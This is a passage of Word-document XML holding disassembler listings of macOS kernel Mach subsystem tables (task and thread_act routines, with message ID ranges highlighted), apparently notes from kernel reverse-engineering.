      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 3B0h                 ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04B08                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq offset _Xtask_create ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 5                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 34h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 3BB16000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 1                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 2Ch                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 3BB2C0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 3                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 4000000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04B08                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 3BB4D0h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 3FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dq 2Ch                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRDefault="00D060FE" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>thread_act_subsystem</w:t>
      </w:r>
      <w:r w:rsidR="00ED4A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 public thread_act_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8 ; const thread_act_subsystem thread_act_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8 thread_act_subsystem_0 dq offset thread_act_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                                         ; DATA XREF: thread_act_server_routine:loc_FFFFFF80003C14A2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                                         ; thread_act_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E051B8                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0E10h </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E051B8                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0E2Ch</w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 3B0h                 ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq offset _Xthread_terminate; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 1                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E051B8                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 3C163000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 4                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 db 0B0h, 3, 2 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 3B0h                 ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 3C1820h              ; routine.argc</w:t>
      </w:r>
    </w:p>
